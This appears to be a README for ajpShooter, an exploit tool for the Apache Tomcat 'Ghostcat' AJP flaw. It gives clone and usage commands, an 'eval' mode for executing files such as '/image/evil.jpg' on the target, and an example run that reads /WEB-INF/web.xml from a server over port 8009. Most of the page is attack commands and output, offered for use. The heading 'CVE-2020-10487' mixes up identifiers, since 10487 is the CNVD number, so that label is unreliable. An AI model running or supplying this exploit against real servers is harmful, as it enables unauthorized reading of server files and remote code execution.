CVE

CVE-2020-10487 - Apache Ghostcat

Installation

git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487.git

Usage

python3 ajpShooter.py

Flags


       _    _         __ _                 _            
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
         |__/|_|                                        
                                                00theway,just for test
    
usage: ajpShooter.py [-h] [--ajp-ip AJP_IP] [-H HEADER] [-X {GET,POST,HEAD,OPTIONS,PROPFIND}] [-d DATA]
                     [-o OUT_FILE] [--debug]
                     url ajp_port target_file {read,eval}

positional arguments:
  url                   target site's context root url like http://www.example.com/demo/
  ajp_port              ajp port
  target_file           target file to read or eval like /WEB-INF/web.xml,/image/evil.jpg
  {read,eval}           read or eval file

optional arguments:
  -h, --help            show this help message and exit
  --ajp-ip AJP_IP       ajp server ip,default value will parse from from url
  -H HEADER, --header HEADER
                        add a header
  -X {GET,POST,HEAD,OPTIONS,PROPFIND}
                        Sets the method (default: GET).
  -d DATA, --data DATA  The data to POST
  -o OUT_FILE, --out-file OUT_FILE
                        write response to file
  --debug

Examples

$ python3 ajpShooter.py http://172.26.82.122:8080/ 8009 /WEB-INF/web.xml read

       _    _         __ _                 _            
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
         |__/|_|                                        
                                                00theway,just for test
    

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1257-1475781398000"
[<] Last-Modified: Thu, 06 Oct 2016 19:16:38 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1257

<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
  version="3.1"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to Tomcat
  </description>

</web-app>

URL list